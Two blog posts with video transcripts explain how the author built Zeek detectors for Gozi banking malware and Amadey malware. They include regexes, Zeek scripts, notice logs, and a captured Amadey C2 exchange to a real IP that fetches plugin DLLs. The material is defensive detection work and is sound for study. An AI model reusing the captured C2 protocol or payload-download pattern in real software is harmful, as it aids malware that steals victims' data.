1689201032.792223	CtPZjS20MLrsMUOJi2	10.7.12.121	49801	91.199.147.95	80	-	-	-	tcp	GoziMalwareDetector::GoziActivity	Potential Gozi banking malware activity between source 10.7.12.121 and dest 91.199.147.95 with method GET and URI /vnc32.rar	-	10.7.12.121	91.199.147.95	80	-	-	Notice::ACTION_LOG	(empty)	3600.000000	-	-	-	-	-
1689204683.938169	CilF4d1b6woayAE906	10.7.12.121	50413	151.248.117.244	80	-	-	-	tcp	GoziMalwareDetector::GoziActivity	Potential Gozi banking malware activity between source 10.7.12.121 and dest 151.248.117.244 with method GET and URI /uploaded/bc1bm932Gi8AkB7CMdoi/dV6NGeXlcWdoFbsJnFC/FQZnIx7u0wQZs8gXewgk2O/_2BqEL_2F5vUH/VjpcgRrm/NgFQBF4d0ml2qUjPnz05CNh/WBeUsAyX8h/DYU_2Be6ioc_2FA9o/bkBn4zKxTE1N/1SebIT_2BB2/5hdp86s2tIvCxD/tZmUgcI6tODvZKdoJyys1/e4sK8m7GZS45MABe/ErGNCS3Es2MiUbX/8g2aKSm8DCj6uNwDbP/RnZ8rlx9a/lrUNLg4HRLMm6ysR4pwf/VtZBd5aLMF2Q_2FrqZr/qT7tLbEkySOgW4gIG9cEFr/b3tW5AqoOLBZY/_2FK4oG1/WJk_2B.pmg	-	10.7.12.121	151.248.117.244	80	-	-	Notice::ACTION_LOG	(empty)	3600.000000	-	-	-	-	-
#close	2023-07-24-19-00-14

Stay tuned to my blog and I will post updates if I find ways to improve the code.

References:

• https://malware-traffic-analysis.net/2023/07/12/index.html
• https://www.malware-traffic-analysis.net/2023/03/06/index.html
• https://unit42.paloaltonetworks.com/march-wireshark-gozi-answers/
• https://medium.com/@enyel.salas84/unveiling-the-gozi-infection-detecting-gozi-in-an-active-directory-ad-environment-using-9773baebe25f
• https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Gozi&threatId=-2147225522
• https://github.com/mlodic/ursnif_beacon_decryptor
• https://github.com/0ver-fl0w/ISFB_Tools
• https://twitter.com/Unit42_Intel/status/1633934017031467010
• https://app.any.run/tasks/5e4dbbe3-78a0-4c63-80f8-203b7ad91cd0/
• https://app.any.run/tasks/d1a96aea-a514-4f86-acd7-e9391a8ec959/
• https://app.any.run/tasks/1406d885-93e3-43e6-8182-667adb6f7ff7/
• https://app.any.run/tasks/f3771459-62f8-48b8-a1bf-a1b182af3599/
• https://app.any.run/tasks/15800ac5-44bf-4628-9653-f0364c80fc79/
• https://app.any.run/tasks/59a8fe6a-e6b2-4e09-9333-dd19227c0e51/
• https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/ursnif

Video Transcript:

00:00:00:00 – 00:00:23:05
Keith
Hey, today we’re going to talk about how to detect the Gozi banking malware with Zeek. And this is the third type of malware that I just randomly picked up and tried to detect with Zeek. So I’m calling this my Zeek roulette number three. All right, so what I want to tell you about this malware is that it’s been around a while.

00:00:23:06 – 00:00:48:20
Keith
It’s been, it’s pretty popular. I believe it was in 2020, it was one of the more it was like in the top three or five different malware infections out there. So getting a detection for this would be very useful for a lot of people. So what I did is I found a pcap online that had an infection in it and I studied it and did some online research and put together a detector.

00:00:48:20 – 00:01:12:04
Keith
And this video, I’m going to walk you through my methodology, good or bad. I’m going to walk you through my methodology of putting a detection together for Zeek, for the Gozi malware. And I will say Gozi has a lot of variants and spoiler alert, we’ll be able to detect variants too. So that will be a very cool side effect of what we’re putting together.

00:01:12:07 – 00:01:36:18
Keith
Okay, so what I’m going to do is switch your screen here and what you see on your screen is a draft blog that I’m putting together for this work that I’ve done. It’s likely going to change by the time this video is produced and published. So just be aware of that. I’m just using it to point out certain aspects of what I developed and the meat of what you’re seeing here should be in a blog.

00:01:36:18 – 00:02:05:23
Keith
It just may look a little different. Okay, so the very first place you’ll want to visit is this website that I’m putting my cursor on here, the malware traffic analysis website. And if you go to that website, there is a text file full of notes and there is a pcap there. And if you download both of them and the password is infected, you can open the zips and read the text file and you can look at the Pcap in Wireshark.

00:02:05:25 – 00:02:40:00
Keith
As you watch me do this video. This is the pcap that I used to write this logic. So if you want to follow along, this is the the content you’ll be seeing on your screen. Okay. So if you open the notes file from malware traffic analysis, you’re going to see what I have on your screen right there, which is some notes on the C2 traffic and some notes and the components that the malware downloads in order to have its logic or functionality.

00:02:40:03 – 00:03:03:21
Keith
This is written by the author of malware traffic analysis dot net. I just put it in here verbatim, so we had it as a reference. So there’s two types of traffic you’re going to see on the wire when Gozi is active. One is going to be its C2 and I’m going to highlight it here. That’s the top part.

00:03:03:23 – 00:03:28:06
Keith
And the other activity is going to be it downloading the different components that needs to run. And there’s like a VNC component and other components that I haven’t even gone into and studied deeply. I just know that it calls a bunch of components that we’re going to use that fact in our detector. So at the end of the day, what I’m going to do is I’m going to write a regular expression that’s going to detect all this stuff on the top.

00:03:28:13 – 00:03:52:12
Keith
And I’m going to write another regular expression that’s going to detect all this stuff on the bottom. Then I’m going to put them together with an or like logically an OR and it’s going to make one big regular expression that’s going to detect all this stuff. Okay. So let’s talk about the two different types of activity. The first, let’s talk about the easiest one first, the components.

00:03:52:12 – 00:04:26:17
Keith
And that’s the bottom part here. Now, when Gozi installs itself on a victim, it goes out on the Internet and downloads its components via HTTP. And when it does this, it makes it look like RAR files. But I’ll tell you, it’s not it’s not RAR files. If you were to run these files through Zeek and look at the mine types and all that kind of stuff, it doesn’t come up as rar it comes up with blank because it’s just encrypted binaries that are named to look like RAR files.

00:04:26:20 – 00:04:50:26
Keith
Now, I started looking at these RAR files first, because it was obviously the easiest part of the detection. And I said to myself, What are the chances that these RAR files are actually used in normal real traffic out there? That if I were to use them to detect the malware, I’d be running into false positives. So what I did is I went to a couple of customer networks I’m allowed to monitor and I search for

00:04:50:26 – 00:05:15:08
Keith
these RAR files. I totally expected to get a ton of hits because these are large universities. They have every type of traffic you would imagine. Nothing. Absolutely nothing. I was shocked. I went to another customer network search it. Nothing went to another customer network, searched it, nothing. So I said, you know what? This might be a good methodology to detect this malware.

00:05:15:08 – 00:05:41:08
Keith
Now, yes, the malware can change these names and we wouldn’t detect it, but we got two different methodologies and it’s going to be a lot harder for the malware to change its C2 traffic than it would be to just change these names. Okay. So the regular expression that I came up with for these RAR files is pretty short. It’s right down here, and I’m gonna highlight it for you.

00:05:41:11 – 00:06:05:03
Keith
So it’s looking for three words, and I’m going to mispronounce probably the first one. It’s stilak, cook and VNC. Then there’s a 32 or a 64, and then there’s a dot rar. I put a slash on the front, which I had to escape with a backward slash, and I put a dollar sign at the end, which means I want to find this RAR file at the end of the string.

00:06:05:03 – 00:06:33:05
Keith
And I don’t really care about what comes in front of that slash. So there can be other subdirectories up there. I don’t really care. I just want to find these RAR files. So that regular expression right there, that short, regular expression, will detect this component activity for Gozi. So that’s now done for us. Let’s focus our attention on this C2 traffic up here.

00:06:33:08 – 00:06:52:01
Keith
So there’s a couple of things you want to know out of here. And I’m going to point out to you right in the logs here, there is and this is all again, HTTP traffic. So you have your HTTP method like a get or a post and then the C2 traffic always starts out with some human readable word.

00:06:52:06 – 00:07:07:22
Keith
I’ve seen the word uploaded, I’ve seen other ones. I think it’s like zero to hero. I’ve seen just names like a person’s name, like Drew. It could be anything. And that’s actually not part of the C2. You throw

00:07:07:22 – 00:07:13:23
Keith
that part of the string away. I’m only pointing it out to let you know that you need to throw that part away.

00:07:13:25 – 00:07:36:22
Keith
The part we’re looking for is what I’m going to highlight here, and it’s between the brackets and it’s the other part of the URL. It’s going to have a base64 string and it’s going to have some backslashes and some underscores. Now, this is the notes from the person that runs malware traffic analysis, dot net. I will tell you, because I study this, that it’s not that simple.

00:07:36:29 – 00:07:59:28
Keith
You can’t just put underscores anywhere in there because Gozi uses underscores very specifically and we’re going to use that in our detector. So that way we’re only detecting Gozi and we’re trying to throw away anything else that could be false positives of just regular web traffic. The extension on here, all we need to know is that there is an extension.

00:07:59:28 – 00:08:25:01
Keith
The actual extension is not that important because I’ve seen it be a bunch of different types of extensions. So the fact that you see a PCT or a DIB or a PMG, not a big deal, just know that we’re going to be looking for an extension. Any extension. Okay, So when Gozi sends it C2 data, it encrypts it.

00:08:25:04 – 00:08:49:21
Keith
So there is an encryption key inside the Gozi malware that it uses and the encryption scheme that it uses and escapes me. I think it’s serpentine, but I could be thinking of a different piece of malware, but it uses a encryption algorithm, encrypts the data, then base64 the data. So you can imagine now it looks like base64 string.

00:08:49:24 – 00:09:29:24
Keith
So kind of random looking characters. Then it will put underscore is in there, but it uses underscores to encode base64 data. Okay, I know this is probably kind of hard to understand, but there’s two characters, the plus and the forward slash and base64 data that Gozi encodes using the underscore character and two other characters afterwards. So for instance if it’s the plus sign, if that’s what it was in Base64, Gozi would encode that as underscore 2B.

00:09:29:27 – 00:10:02:11
Keith
If it was the forward slash sign, it would encode it with underscore 2F, if it’s a new line underscore 0A and if it’s the carriage return, it’s underscore 0D. This is the reason why you can’t just look for random underscores because underscores are used very specifically in this manner for Gozi and this helps us find that needle in the haystack when we have a whole bunch of web traffic out there and we’re only looking for the Gozi C2 web traffic.

00:10:02:13 – 00:10:31:22
Keith
Now, I’m about to get more complex on you. So if we put a regular expression together for this big base64 string, which includes that human readable string up front and the slashes and the weird underscores, it’s going to get pretty big. And I’ll highlight it for you. Now, what this regular expression is saying is up front, it’s saying, look at the beginning match at the beginning of the string.

00:10:31:23 – 00:11:06:21
Keith
That’s what the carat means. Look for a slash, it’s actually escaped with the backslash look for the word and that’s just slash little W plus. So just look for characters that represent a word. And this is the uploaded in our string above. Here, I’ll show you up here. You see that uploaded? That’s what we’re matching with that word. Okay, so then we start looking for the base64 characters, and that’s just a-z lowercase uppercase in digits.

00:11:06:24 – 00:11:34:04
Keith
We’re not looking for the plus because that’s encoded. We are looking for the forward slash because Gozi just randomly throws that in the URL just in random spots. Now here’s the caveat. It can throw it that forward slash in where we have our underscore or 2B 2F 0A and 0D, so that makes our regular expression a little bigger.

00:11:34:06 – 00:12:08:02
Keith
And what I’m doing here is I’m showing you I’m doing an or and you start to see my underscore and then you see this slash question mark and it’s escaped with the backslash. What that says is there could be a slash here and the question mark says or not, and then you’ve got the two and then you’ve got a possible slash and then you got the F, and then you have an or and then you have the underscore possible slash 2 possible slash B or and it continues on for all the underscore possibilities.

00:12:08:04 – 00:12:38:19
Keith
So that gets us through that part of the regular expression. So over here you see 200. Now I did analysis and a lot of web traffic and I saw that Gozi tended to have more than 200 characters in it for the URL, and normal web traffic would tend to have less than 200 characters. So I use that my detector and I said it needs at least 200 characters.

00:12:38:21 – 00:13:01:18
Keith
And then I go on to say I need some type of file extension, just any file extension. And I made it alphanumeric and it’s got the dot in front of it. And then I put the dollar sign at the end, which says this should be the end of the string. All right. So what I did is I put a find command together and I’m going to show you that in a second.

00:13:01:21 – 00:13:25:23
Keith
But I put a find command together and ran it through parallel. And I ran this regular expression, actually, both of these regular depression across a ton of Zeek logs that I had available on customer networks. You may want to do that for yourself. I’ve included this command for you and is right here. I’ll highlight it for you. Now, a couple of caveats.

00:13:25:23 – 00:14:03:21
Keith
The first time I ran this, I pretty much almost had zero false positives except for about five lines worth of false positives. And I was like, Shoot, how do I get these false positives out of my hits? And I started studying the false positive versus the Gozi traffic and I noticed that real traffic doesn’t have as many subdirectories as Gozi traffic because Gozi throws in a ton of slashes just randomly to make it look like web traffic and it throws in like 20 or 30 of them usually, which is a lot more than normal web traffic will usually use.

00:14:03:23 – 00:14:37:15
Keith
So what I did is I went and I looked for more slashes than normal and I said, that number is ten or more. And I just found that empirically, by looking at data on a network, How did I do that? Well, let me explain this command to you. Now we’ve got our find command that will look in slash logs, pull out all your HTTP logs, pass the log names to the parallel command, which runs ten jobs and Zcats

00:14:37:15 – 00:15:00:10
Keith
your logs. And this says I want to read my input from standard in, which is over here. We run our data through Zeek cut and we pull out just the host and the URI, and then we dump it through AWK and tell you I know enough to be dangerous and I’m going to teach you some things. I’m not a guru or an expert in it.

00:15:00:10 – 00:15:04:15
Keith
I just know how to do some certain things to pull data for me

00:15:04:15 – 00:15:22:10
Keith
to see what I need to see in data. So I’ll show you something that there may be a better way for. And if you know of a better way, please do tell me I’ll make my blogs better. But I had to add the ability to look for more slashes when our base64 string was long.

00:15:22:18 – 00:15:58:01
Keith
So that way we’re only picking out the Gozi activity and not some false positive HTTP activity. So before we get to that, let me just walk through my command real quick for you. This says run awk and my delimiter is tabs. Look at my second field which is our URI remember we cut it out run this regular expression go right to there. This regular expression is the same regular expression that we talked about earlier.

00:15:58:03 – 00:16:28:19
Keith
It’s the two regular expressions and we can continue on with or we combine them with the or Boolean operation. So one or the other should be possible in order for us to say this is Gozi activity. Now what I did is I added an ampersand on the base 64 side of the regular expression and said gsub, which is a global substitution.

00:16:28:19 – 00:16:36:20
Keith
And I said, Look for forward slashes, which in regular expression language, that’s how you say forward slash because you got to escape it,

00:16:36:20 – 00:16:52:12
Keith
replace it with a forward slash. So basically do nothing. I do realize it’s probably doing something in the CPU, but for our purposes of the string, it’s doing nothing and we’re looking at the second field.

00:16:52:14 – 00:17:24:15
Keith
So we’re now counting the number for forward slashes in our URI. And we only detect when there’s more than ten of them. That’s what that’s doing for you. So if I take that logic and I go back to that pcap at the very beginning of this video that I said go download this from malware traffic analysis, if I run that through Zeek, I get an HTTP log, then I run it through this logic, just like I showed you above in that box above.

00:17:24:17 – 00:17:52:06
Keith
And I will tell you I ran this on macos, so I recommend running GAWK. So that way you’re on par with other Linux systems because it’ll be exactly the same. And I plugged in my regular expression, but you look here and I am finishing the command with a wc dash L which says count the number of lines that come out.

00:17:52:09 – 00:18:18:13
Keith
So what this whole command should do is detect any Gozi activity in HTTP log and count the number of lines. And when that happens, it says you have 94 lines that match. Yay. So it means we matched Gozi on our on our example pcap, which is what we need to do. So now that we have it working in Unix land we need to get this working in Zeek land.

00:18:18:15 – 00:18:41:26
Keith
So to do that, what we need to do is watch HTTP traffic and look for those URLs using those regular expressions that we talked about. You could do that via the event http_requests and I put the link for you here if you want to go read more about it. And then I just went through the find command and made it into Zeek language.

00:18:41:26 – 00:19:10:00
Keith
And I’m going to go through this pretty quickly because a lot of this, like most of this is boilerplate. I name the module GoziMalwareDetector. We have the module exporting a bunch of stuff. We have a log file that’s created, this is going to be your Gozi.log, it’s output is going to match this format. And the output record is pretty simple as all the usual suspects of the connection information are up front.

00:19:10:00 – 00:19:26:19
Keith
And then you have the HTTP method and the payload, which would be those RAR URLs or the base64 URLs. We have a notice. So not only do we make a log file, but we will fire a notice if we see Gozi as well.

00:19:26:22 – 00:19:49:21
Keith
Now, down here I gave you the Gozi logging event, so that way if you want to catch the information before it went to a log, you could via an event. And if you want to mess with the filtering on the log, you can do that through the logging policy. Again, this is all boilerplate Zeek code stuff, more boilerplate.

00:19:49:21 – 00:20:18:24
Keith
We are going to create a Gozi record on the connection record using our info record. The set_session is like most other set_session hooks that you’ve probably seen before that populates this record on the connection record. Now the next function. This is really the meat of what we did. This will log our Gozi detection and what it says is if we don’t have Gozi data, don’t do anything.

00:20:18:26 – 00:20:48:09
Keith
And if we do send it to the log and generate a notice. So both of the log and the notice will be generated, then the data on that temporary record that we created will get deleted and we’re done. The other event that’s the meat of what we added is this http_request event. Now here, like most Zeek boilerplate we set session.

00:20:48:09 – 00:20:56:03
Keith
So it sets up that temporary record for us. I do a little trickery here to make our URL lowercase so that way

00:20:56:03 – 00:21:15:01
Keith
one of my regular expressions only needs to be in lowercase and then I run the regular expression through. So this is it right here. And you can see I take the lowercase of the URL and I run that RAR regular expression through there and I don’t have uppercase of anything.

00:21:15:01 – 00:21:16:05
Keith
And that automatically

00:21:16:05 – 00:21:43:14
Keith
takes care of any permutations in case sensitivity on those words. Then we or it with the base64, regular expression. And there it’s mostly the same, except a couple of changes. One is the dash W doesn’t exist in Zeek, but there is this blank character class. And I said, Don’t use blank.

00:21:43:14 – 00:22:07:07
Keith
That’s what the carat is there for. So I’m basically kind of faking the slash w in Zeek land with this character class. And the other one is we don’t have to replace a string in order to count it. We can actually call the function called count _substring and look for the number of slashes and only detect when it’s greater than ten.

00:22:07:09 – 00:22:31:12
Keith
So a little simpler in Zeek land. Now down here, all this does is it sets up the info record and then it sends it out to our function that logs it and then it returns. Pretty simple. This event down here, all that does is it sets up our log, our gozi.log with the logging policy and the logging event.

00:22:31:15 – 00:22:59:16
Keith
So immediately you should say, hey, how many variants does this detect? And I will say good question. I tested about six that I could find on any.run and it detected all of them because they all use that base64 formatted string for their C2. So I invite you to go on any.run. Look for these different types of malware, download their Pcaps and run them through here and see what tdetects and what doesn’t detect.

00:22:59:20 – 00:23:23:18
Keith
If you find something that misses, hey, let me know. We’ll try to add another detection to it. Now, if you really don’t care about all the stuff that I told you and you just want to get to the source code, I got that for you to on our, I say our, the Corelight GitHub accounts under Zeek Gozi detector. I put a couple examples of the logs here so we could talk through them.

00:23:23:21 – 00:23:47:12
Keith
Now, again, I told you there was a Gozi dot log that’s has lines generated every time there is a Gozi activity seen on the network. And it looks like your usual Zeek log with usual suspects up front. And what I did is I tried to highlight the relevant information for you, and you can see the big base64 strings are all highlighted here.

00:23:47:15 – 00:24:08:07
Keith
And that’s to point out, these are the strings that we were able to detect as Gozi activity on the network. Now, if you look down here, you can see we also detected the RAR files. So there’s a VNC32 and VNC64 dot RAR also part of the Gozi malware infection. And you go down here and you see this triple dot and you’re like, why is that there

00:24:08:07 – 00:24:41:26
Keith
Keith? And that’s because we had 94 lines of detection. So most of them are these really long base64 strings. I didn’t want to keep copying and copying the data in here and have you have to scroll down my blog. So I just I’m telling you, there’s a lot of data here that you can look through. Now, our notice log looks like your general notice log, and I highlighted the human readable string for you that says there’s potential Gozi banking malware activity between this source and this destination with this method and this URL.

00:24:41:28 – 00:25:09:26
Keith
And you can see the long base64 string and you can also see the RAR files down here. Now, I have all the references for everything that I’ve used to build this methodology and you can flip through them. I have the malware traffic analysis original site where I got the pcaps. I’ve got Palo Alto Networks has a write up on this.

00:25:09:26 – 00:25:34:28
Keith
So does Medium, so does Microsoft, so does BlackBerry. Now, there are two tools that I have in the middle here that I highlighted for you. These tools, if you know the encryption key to the traffic you’ve seen on your network, you can run the data that I’ve put into Gozi dot log for you through these tools and potentially decrypt the C2 traffic, which is pretty cool.

00:25:35:00 – 00:25:53:18
Keith
I will say the malware author can change the encryption keys. So the very first thing you should do is go out to the Internet and pull all the default keys for Gozi and its variants and try those and if none of those work, then you probably have to analyze the malware and pull out what the true key is.

00:25:53:21 – 00:26:17:16
Keith
But I did when I was doing analysis out there, I did see people have lists of they would put lists of potential defaults, Gozi encryption passwords out there. And if I remember correctly, the one of these projects has a listing in the Python code too. Okay. And then there’s a bunch of any.run links down here and I put those there

00:26:17:16 – 00:26:43:20
Keith
so if you want to look at some variants and then want to do the searches yourself, these are a bunch of different variants I took a look at and ran it through the detector and they came out as detected. So with that, I really hope you got something out of this. It was a fun project to put together and if you know of any better ways to do that forward slash searching in AWK, please let me know.

00:26:43:22 – 00:26:49:15
Keith
And otherwise I hope to see on the next Zeek detection that I write. All right. Thanks. Bye.

The post A Gozi Banking Malware Detector – Zeek Roulette #3 first appeared on DrKeithJones.com.

For my Zeek Roulette #2 I picked a recently submitted sample off of ANY.Run that ended up being Amadey:

https://app.any.run/tasks/31ba58da-30d1-4a08-940d-2412fc629221/

You can download the PCAP from the link above if you navigate to the “PCAP” button in the upper right corner of the lower network connections pane.

If you want to just get to the code, you can find it here:

https://github.com/keithjjones/zeek-amadey-detector

I did some online research to see if anyone has published the C2 protocol. Luckily, a Blackberry blog did just that! According to the blog, Amadey sends C2 information over the clear text HTTP protocol via a POST. The blog lists the C2 fields Amadey will send over the HTTP POST:

If you open the PCAP in Wireshark and Follow the TCP stream for the HTTP connection, you will see the following data:

POST /joomla/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 212.113.119.255
Content-Length: 87
Cache-Control: no-cache

id=896776584425&vs=3.70&sd=5d3738&os=9&bi=1&ar=0&pc=USER-PC&un=admin&dm=&av=0&lv=0&og=1
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 04 May 2023 16:35:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

6
<c><d>
0

GET /joomla/Plugins/cred64.dll HTTP/1.1
Host: 212.113.119.255

HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 04 May 2023 16:36:11 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>
GET /joomla/Plugins/clip64.dll HTTP/1.1
Host: 212.113.119.255

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 04 May 2023 16:36:11 GMT
Content-Type: application/octet-stream
Content-Length: 91136
Last-Modified: Fri, 14 Apr 2023 17:01:49 GMT
Connection: keep-alive
ETag: "643986fd-16400"
Accept-Ranges: bytes

MZ......................@.............................................	.!..L.!This program cannot be run in DOS mode.

The data continues for the PE file, but I truncated the output above. The key line in this output that we will try to detect is:

id=896776584425&vs=3.70&sd=5d3738&os=9&bi=1&ar=0&pc=USER-PC&un=admin&dm=&av=0&lv=0&og=1

This line matches the fields listed in the Blackberry blog.

We can try to detect this line using 2 methodologies:

• Zeek Signatures
• The http_entity_data Event

You can make a Zeek signature to catch this string with the following logic:

signature amadey {
    ip-proto == tcp
    payload /.*application\/x-www-form-urlencoded.*\nid=[0-9]+&vs=[0-9\.]+.*&os=[0-9]+.*&pc=.*&un=.*/
    eval Amadey::match
}

But, in my opinion, this is limited because if the “un” field comes before “pc” field this signature will miss it.

Another, and in my opinion better, option to detect this malware is to handle the http_entity_data event:

https://docs.zeek.org/en/master/scripts/base/bif/plugins/Zeek_HTTP.events.bif.zeek.html#id-http_entity_data

… and search for the string in the “data” field. Do note that if you have a lot of HTTP on your network, this could add significant CPU load on your sensor. Only you can accurately weigh if this logic is worth the CPU to detect Amadey on your network.

The logic for the detector is fairly simple. While most of main.zeek is boilerplate code to create logs and notices, the meat of the logic lies here:

event http_entity_data(c: connection, is_orig: bool, length: count, data: string)
	{
	if (/id=[0-9]+/ in data &&
		/&vs=[0-9\.]+/ in data && 
		/&os=[0-9]+/ in data &&
		/&bi=[01]/ in data &&
		/&ar=[01]/ in data &&
		/&pc=/ in data &&
		/&un=/ in data)
		{
		# This is probably Amadey!
		hook set_session(c);

		c$amadey$payload = data;
		c$amadey$is_orig = is_orig;

		emit_log(c);

		NOTICE([$note=Amadey::Amadey,
				$msg=fmt("Potential Amadey C2 between source %s and dest %s", c$id$orig_h, c$id$resp_h),
				$conn=c,
				$identifier=cat(c$id$orig_h,c$id$resp_h)]);
		}
	}

This logic tests each field in the HTTP data using consecutive “ands”. If one of the anded conditions fails, processing stops. In this case, Amadey was not detected.

An example amadey.log for a detection in the PCAP we downloaded earlier from ANY.Run is:

#separator \x09
#set_separator	,
#empty_field	(empty)
#unset_field	-
#path	amadey
#open XXXX-XX-XX-XX-XX-XX
#fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	is_orig	payload
#types	time	string	addr	port	addr	port	bool	string
XXXXXXXXXX.XXXXXX	C9rXSW3KSpTYvPrlI1	192.168.100.64	49200	212.113.119.255	80	T	id=896776584425&vs=3.70&sd=5d3738&os=9&bi=1&ar=0&pc=USER-PC&un=admin&dm=&av=0&lv=0&og=1
#close XXXX-XX-XX-XX-XX-XX

As you can see, the payload here matches the payload in the PCAP we downloaded earlier. This proves we detected Amadey and we also get to see the data it sent!

Sources:

• https://app.any.run/tasks/31ba58da-30d1-4a08-940d-2412fc629221/#
• https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot
• https://www.virustotal.com/gui/file/121c452418772be07136bd8d273006783bc52db49c317a962901cce0ee3818a8/details

Transcript:

[00:00:00]

[00:00:08] Keith: Hey, welcome. Today we are going to talk about detecting Amadey malware with Zeek. And this is my second Zeek Roulette where I just picked something on the internet interesting, hopefully interesting, and try to solve it with Zeek. So in this case, I just picked a piece of malware off of any.run, and I looked at some research online and some C2 communication.

[00:00:36] And I came up with a couple of detections, so I thought I would share it with you. All right, so what I’m gonna do is take you to my blog post and you’re seeing a draft version of my blog post. So it might look a little different once you actually go to it once I’ve published this video. But what I wanted to show you was the process I went through to understand this piece of malware and to write a detection for it in Zeek.

[00:01:02] Now, this is my blog here and I gave you the link to the Any.Run URL where you can go and actually look at all this research outside my blog, and in there on the lower pane there’s a network connections pane, and there’s a little word that says Pcap up in the upper right hand corner. If you click on that, you can download the same PCAP that I used in this example, if you’d like to follow along.

[00:01:33] If you want to just get to the code, well, I’ve got that for you too here. And I’m showing you with my cursor. You just go into my GitHub repository and I’ve got all the scripts there for you. But I’ve pulled out all the relevant parts into this blog article, so that way I can walk you through it and we can understand it.

[00:01:53] So once I downloaded the Pcap and I took a look at it, I immediately tried to see if anybody else had done work on trying to understand the C2 protocol. Blackberry threat research, they published a blog article about how they picked it apart. And one of the subsections of that blog article is the C2 protocol.

[00:02:16] So it’s really helpful for us. So what I did was, took a look at their article, so you didn’t have to, you don’t have to dig into the weeds. And basically it says that the Amadey. Malware sends an HTTP post with some fields. Okay. And it’s not, the fields aren’t embedded in the URL directly or the headers or anything like that.

[00:02:45] It’s actually in the body of the HTTP. And I’m gonna show you that. I’m gonna show you the network capture of the follow TCP stream, if you think of it in wireshark terms, so that you can see what this actually looks like. So in a nutshell, the way the C2 works is it fills out fields in a form and sends it across an http.

[00:03:14] Now, the fields were documented by Blackberry, and I re documented them here in this table that you see, and I link to their blog down here and I’ve got a link in the sources section at the bottom as well. And there’s a bunch of fields in here and there’s a few fields that I noticed when I looked at a pcap that seems like they always will be in there.

[00:03:37] One of them’s gonna be the ID field. That is the identification volume, serial number, basically when this malware infects your computer and it checks in to its command and control center, it’s gonna identify itself, and that’s what’s filled out here in this ID field.

[00:03:58] And I’m, I realize I’m pointing in its exact opposite way on video.

[00:04:04] I’ll never learn.

[00:04:06] But anyways, there’s a couple other fields in there that are of interest. There’s the vs, which is the version, and that’s the Amadey malware version. There’s the ar, which is whether or not you have administrative privileges, if it’s run under administrative privileges or not. There’s this BI and LV and both of that can be a one or a zero and it says whether or not this is a 64 bit, a 32 bit, or the LV says install additional malware. The OS version is given and that is in the OS field. The antivirus, if it’s installed, is given . It’s a number that corresponds to a table in the Blackberry blog of the different types of antivirus that can be on a computer.

[00:04:53] Now, two other interesting ones are the pc, which is the computer name, and the un, which is the username. Okay, so knowing this, we should look for these fields to see if the Amadey malware is communicating via its C2 protocol across the network. That’s what we’re gonna do here in theory.

[00:05:18] Now what I wanna show you is if you open that pcap that I talked about earlier in Wire Shark and you do the tcp, the follow TCP stream on the HTTP connection, you’re gonna get something like I’m showing you in your window right now. This is the post that I told you about, and I’m not so sure if Joomla index is all that important.

[00:05:41] That’s probably something that can be changed very easily by the malware. So I did not try to key on that. But down here where I highlight now, you can see the actual string with all the fields in it. So in theory, we watch for this type of string to go across a network. And if we see it, we alert on it.

[00:06:12] Now, I’m just gonna show you more down here, and I did a little more research into it, and I’m gonna tell you, I’m not an expert on this malware. I’m just trying to show you a good network defense detection. But if you go into Blackberry’s article, they talk about what the command and control center can respond with and so forth.

[00:06:32] And this is the response, which actually means something. But when I tried to match it up at the Blackberry article, it didn’t match up exactly. So I’m not really sure if this is because it’s a different strain of malware or if something’s broken when this malware was run on any run, but it didn’t match up exactly even though the structure kind of looks like what we expect.

[00:06:58] Now down here you can see it tries to get this cred 64 dll, and it says 4 0 4 not found, and then it changes the case and you can see that it’s now found and it’s an octet stream. And if you’ve done any type of malware analysis, and you look at this beginning of the string and you go, Hey, that looks like a Windows executable, especially with this big phrase right here that says Cannot be run in DOS mode.

[00:07:33] And you say, Hey, it looks like over HTTP, an executable was grabbed, which is what you’d expect in some type of malware C2 communication. It doesn’t happen all the time, but when you get other stages to the malware, and it looks like in this case there was another stage possibly given to it, this is how it’s typically done.

[00:07:58] All right, and I’ll just note that I truncated the output. It’s a lot longer than that. So the key line was this, and I highlighted it for you here because this whole phrase, this is what we’re gonna be searching for.

[00:08:15] Okay, so I sat back and I was like, all right, how if I could pick out the ways that I could solve this realistically with Zeek, what would I code up?

[00:08:27] And I came up with two general methods. The first one is just using Zeek’s signatures. Zeek’s signatures are limited. Now, it only searches the first 1024 bytes, but, from what I’ve read about this malware strain, it continues to beacon this string. So you’d expect it to end up pretty close to the beginning of these connections.

[00:08:52] So that’s saying Zeek signatures, maybe we could use that to do a type of a detection. So set that aside for a second. The other way we can do it is by handling the HTTP events. And there’s this one called HTTP Entity Data that actually gives you the body data that we just saw on that follow TCP stream.

[00:09:18] So I’m gonna show you two different methods of doing this. One that would work in theory. And then the other one that I would probably run for myself in practice. So the one that would work in theory is the Zeek signatures and that is probably the simplest way of going about this. Now, I gave you the signature here and I said, we’re looking on the TCP protocol.

[00:09:44] We’re looking for this payload. Okay? And it’s actually a regular expression here. And what I did is I went back to my follow TCP stream and I said, okay, well we are gonna expect this form URL encoded. That’s something that appears this malware does is it sends it across in this encoding, and then I look for a new line and then I start looking for things that could be in that phrase, like this id, I said It has to be a digit, and the plus says any size digit, and then you have the ampersand, the VS is the version, and you’re looking for a version here, which could have a dot in it and it could be any size.

[00:10:31] And then here’s where things kind of get hairy. I say there’s gonna be some stuff in here because these malware variants aren’t gonna all send the same fields all the time in all the same order. So we gotta code this so that we can try to hit the most variants of the Amadey malware. So what I said is there can be stuff in here, other fields that we may not know about, that somebody may have coded into other variants.

